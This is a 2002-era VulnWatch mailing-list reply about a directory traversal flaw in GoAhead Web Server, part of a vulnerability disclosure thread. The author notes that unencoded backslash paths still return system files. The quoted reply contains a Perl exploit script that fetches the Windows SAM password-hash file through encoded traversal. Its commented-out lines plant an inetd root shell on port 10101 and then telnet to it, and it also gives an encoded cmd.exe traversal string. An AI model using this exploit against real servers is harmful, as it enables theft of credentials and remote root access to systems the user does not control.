Re: [VulnWatch] wp-02-0001: GoAhead Web Server Directory Traversal + Cross Site Scripting

[Matt Moore <matt () westpoint ltd uk>]

Hello,

I also received an email regarding this vulnerability from Rein Van 
Koten of AtosOrigin, indicating that another large vendor
who is using GoAhead in one of their products also has these 
vulnerabilities.

He also pointed out that it is not necessary to URL encode the slashes, 
so the traversal bug reported in wp-02-0001 is essentially a duplicate 
of the original bug found in Feb 2001, which has still not been fixed by 
GoAhead.

Connecting directly to the server using netcat or telnet and issuing a 
GET request for the file using just ..\..\..\..\..\..\winnt\win.ini 
rather than the URL encoded version will return the file.

I was under the impression that they had fixed the original bug, but 
apparently not. When I tried to verify this with Internet Explorer, it 
did appear to be fixed (version 2.1 tested).

Unfortunately, If you make this request using Internet Explorer, it is 
silently changed - the backslashes become forward slashes and the 
request fails (IE still displays the backslash version in URL field). I 
didn't realise IE did this, and hence thought the problem fixed.

Netscape just removes the ..\'s altogether, and simply requests 
/winnt/win.ini.

The advisory (wp-02-0001) will be updated to reflect the above information.

regards,

Matt


xile () hushmail com wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Have been aware for some time and I Just wanted to add a little to
>
> Mr. Moore's observations ;
>
>
> Title: GoAhead Web Server Directory Traversal + Cross Site Scripting
>
> > Also Effected: Orange Web Server -all versions
>
> Risk Rating: Medium
>
> > escalated to risk: high - password hash pilfer via 300 year old
>
> > traversal technique
>
>
> Software: GoAhead Web Server v2.1
> <added Orange Web Server - All
> <Orange Web Server uses GoAhead WebServer 2.1 technology so it is
>
> <powerful and stable. - nuff said
>
>
>
>
> Platforms: Windows NT/98/95/CE
>            Embedded Linux
>            Linux
>            QNX
>            Novell Netware + others
>
> <ADDED: Hard Hat Linux -                             started
> <bundling  GoAhead with thier distros, so there should be palm
>
> <pilots, cellphones and all kinds of nifty prototype devices
>
> <running this sad-ware
>
>
>
> #!/usr/bin/perl
> # spawns a shell on port 10101
> use IO::Socket;
> if (@ARGV < 1) { print "usage: perl go-orange.pl [host]\n"; exit; }
> $host = $ARGV[0];
>
> $shell = IO::Socket::INET->new( PeerAddr=>"$host",
> PeerPort=>"80",
> Proto=>"tcp") || die "Connection failed.\n";
>
> #dump sam is success on Orange and GoAhead!- was able to jump around
>
> #and do interesting things with encoding 0-day
> #%77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6F%%320W%65
>
>
>
>
> print $shell "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam
>
> ##################################################################
> #commented out hypothetical embedded webserver in transmeta-maytag
>
> #stove scenario. Will leave hand held device ( game boy) format vuln
>
> #testing to experts at Non-profit .org's
> # Only testbeds I saw were win32 ( I only looked for 10 #minutes)
>
> #print $shell "GET
> #/..%5C..%5C..%5C..%5C..%5C..%5C/bin/echo%20\"10101%20stream%20tcp%2
>
> #0nowait%20root%20/bin/sh%20-i\"%20>>%20/tmp/inet|
> #HTTP/1.0\n\n";
>
> # we get signal again
> #$shell = IO::Socket::INET->new( PeerAddr=>"$host",
> #PeerPort=>"80",
> #Proto=>"tcp") || die "fuq, we no get signal.\n";
>
> #print $shell "GET
>
> #/..%5C..%5C..%5C..%5C..%5C..%5C/usr/sbin/inetd%20/tmp/inet|
>
> #HTTP/1.0\n\n";
>
> sleep 1;
>
> print "handheld haqrz connect to $host on port 10101...";
> system("telnet $host 10101");
>
>
> - - xile
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wlkEARECABkFAj01ioASHHhpbGVAaHVzaG1haWwuY29tAAoJEBnsRZrmhGsJapUAnRCE
> Mg4OfVISUBrPgWxFcbW2mK6XAJ4/xxmJInaJRv/YqC45ki6wYPOPbA==
> =IKhW
> -----END PGP SIGNATURE-----
>
>
> Communicate in total privacy.
> Get your free encrypted email at https://www.hushmail.com/?l=2
>
> Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople